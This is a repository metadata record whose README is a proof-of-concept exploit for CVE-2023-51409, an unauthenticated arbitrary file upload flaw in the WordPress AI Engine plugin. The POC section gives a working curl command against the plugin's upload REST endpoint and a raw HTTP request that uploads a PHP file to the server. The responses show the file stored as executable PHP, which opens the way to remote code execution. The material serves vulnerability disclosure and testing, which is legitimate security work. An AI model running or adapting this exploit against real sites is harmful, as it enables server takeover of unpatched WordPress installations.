{"id":21125695,"url":"https://github.com/randomrobbiebf/cve-2023-51409","last_synced_at":"2026-03-19T19:01:20.238Z","repository":{"id":223903298,"uuid":"761865974","full_name":"RandomRobbieBF/CVE-2023-51409","owner":"RandomRobbieBF","description":"AI Engine: ChatGPT Chatbot \u003c= 1.9.98 - Unauthenticated Arbitrary File Upload via rest_upload","archived":false,"fork":false,"pushed_at":"2024-02-22T16:29:56.000Z","size":2,"stargazers_count":1,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-09-22T14:02:24.179Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-02-22T16:26:57.000Z","updated_at":"2024-07-11T16:38:49.000Z","dependencies_parsed_at":null,"dependency_job_id":"52d3cf9a-c652-4738-a902-2d62d8e11863","html_url":"https://github.com/RandomRobbieBF/CVE-2023-51409","commit_stats":null,"previous_names":["randomrobbiebf/cve-2023-51409"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RandomRobbieBF/CVE-2023-51409","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-51409","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-51409/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-51409/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-51409/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2023-51409/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-51409/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29329852,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-11T06:13:03.264Z","status":"ssl_error","status_checked_at":"2026-02-11T06:12:55.843Z","response_time":97,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:25.270Z","updated_at":"2026-02-11T08:33:40.101Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2023-51409\nAI Engine: ChatGPT Chatbot \u0026lt;= 1.9.98 - Unauthenticated Arbitrary File Upload via rest_upload\n\n\n### Description:\nThe AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'rest_upload' function in all versions up to, and including, 1.9.98. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n\n```\nSeverity: critical\nCVE ID: CVE-2023-51409\nCVSS Score: 9.8\nCVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\nPlugin Slug: ai-engine\nWPScan URL: https://www.wpscan.com/plugin/ai-engine\nReference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/a3fc4bac-9be0-4a1c-b4bb-4384d80e22f7?source=api-prod\n```\n\nPOC\n---\nCURL\n```\n$ cat test.txt\nrobbie.txt\n$ curl -X POST http://wordpress.lan/wp-json/mwai-ui/v1/files/upload -H \"Content-Disposition: form-data; filename=\\\"test.txt\\\"\" -F \"file=@test.txt\" | jq -r\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100   336  100   139  100   197   1738   2463 --:--:-- --:--:-- --:--:--  4602\n{\n  \"success\": true,\n  \"data\": {\n    \"id\": \"dc05affbc88c6d731a8fc6d122cd3839\",\n    \"url\": \"http://wordpress.lan/wp-content/uploads/2024/02/test-1.txt\"\n  }\n}\n\n$ curl http://wordpress.lan/wp-content/uploads/2024/02/test-1.txt\nrobbie.txt\n```\n\nRAW HTTP\n---\nRequest\n\n```\nPOST /wp-json/mwai-ui/v1/files/upload HTTP/1.1\nHost: wordpress.lan\nUser-Agent: curl/8.1.2\nAccept: */*\nContent-Disposition: form-data; filename=\"test.txt\"\nContent-Length: 206\nContent-Type: multipart/form-data; boundary=------------------------8ecd2b831e8d20f4\nConnection: close\n\n--------------------------8ecd2b831e8d20f4\nContent-Disposition: form-data; name=\"file\"; filename=\"test.php\"\nContent-Type: text/plain\n\n\u003c?php phpinfo(); ?\u003e\n\n--------------------------8ecd2b831e8d20f4--\n```\n\nResponse\n```\n{\n  \"data\": {\n    \"id\": \"1044f1ab4f6340fea9abecb331fe981c\",\n    \"url\": \"http://wordpress.lan/wp-content/uploads/2024/02/test.php\"\n  },\n  \"success\": true\n}\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-51409","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2023-51409","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-51409/lists"}